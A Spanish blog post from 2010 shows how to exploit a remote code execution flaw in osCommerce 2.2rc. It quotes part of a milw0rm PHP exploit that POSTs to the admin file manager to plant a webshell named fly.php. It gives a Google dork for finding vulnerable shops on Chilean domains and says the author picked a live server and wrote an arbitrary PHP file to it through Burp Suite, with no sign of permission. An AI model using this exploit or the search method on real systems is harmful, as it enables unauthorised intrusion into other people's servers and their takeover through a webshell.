The Pentester

martes, 18 de mayo de 2010

Oscommerce Hacking Live

En este post mostrare como explotar una vulnerabilidad en Oscommerce 2.2rc (maybe another versions too).

La vulnerabilidad que usare ya es muy conocida es un RCE* exploit, pero en este caso no utilizare el exploit, tratare de hacerlo manualmente ;)

El source code lo encontramos en milw0rm.com
http://www.milw0rm.com/exploits/9556
";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>


# milw0rm.com [2009-08-31]


Pero como mencionaba antes solo no usare este exploit, en resumen el fallo consiste en una ejecucion remota de archivos, la que nos permite crear un archivo arbitrario.
Buscando Servidores Vulnerables:

Como ya sabemos goOglear buscaremos el cms afectado.

"site:.cl" + "powered by oscommerce" "2009 -2010" Página 3 de aproximadamente 40,700 resultados (0.27 segundos)

Ubicamos un server vulnerable a osCommerce Online Merchant v2.2 RC2a





Ahora si estamos en windows podriamos usar Telnet para hacer una coneccion entre la web y nosotros, en este caso usare algo mas practico Burp Suite, es un framework muy completo para hacer audicion, pentesting etc, en este caso solo usare la version gratuita que se puede descargar desde su web:
http://portswigger.net/suite/download2.html





usando los mismos parametros del exploit rce eh creado un archivo .php sin ninguna restriccion en el cual puse un simple comando para mostrar el php.ini y mostrar informacion relevante del servidor, un atacante mal intencionado podria ejecutar codigo arbitrariamente y obetener acceso al sistema mediante una php-shell.